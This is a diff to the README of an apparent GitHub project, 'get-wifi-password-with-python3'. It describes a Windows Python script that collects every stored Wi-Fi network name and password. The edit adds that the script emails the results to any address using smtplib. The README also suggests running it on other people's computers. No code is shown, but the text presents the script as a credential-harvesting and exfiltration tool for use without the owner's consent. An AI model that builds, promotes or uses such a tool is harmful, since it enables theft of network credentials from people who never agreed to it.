yhtps237/get-wifi-password-with-python3/README.md

 3. smtplib

-Using these 3 module you can learn all Wifi passwords and their name in computer.
+Using these 3 module you can learn all Wifi passwords and their name in computer and send it to any email.
 Also you can use this script for other people's computer.
 It's for Windows.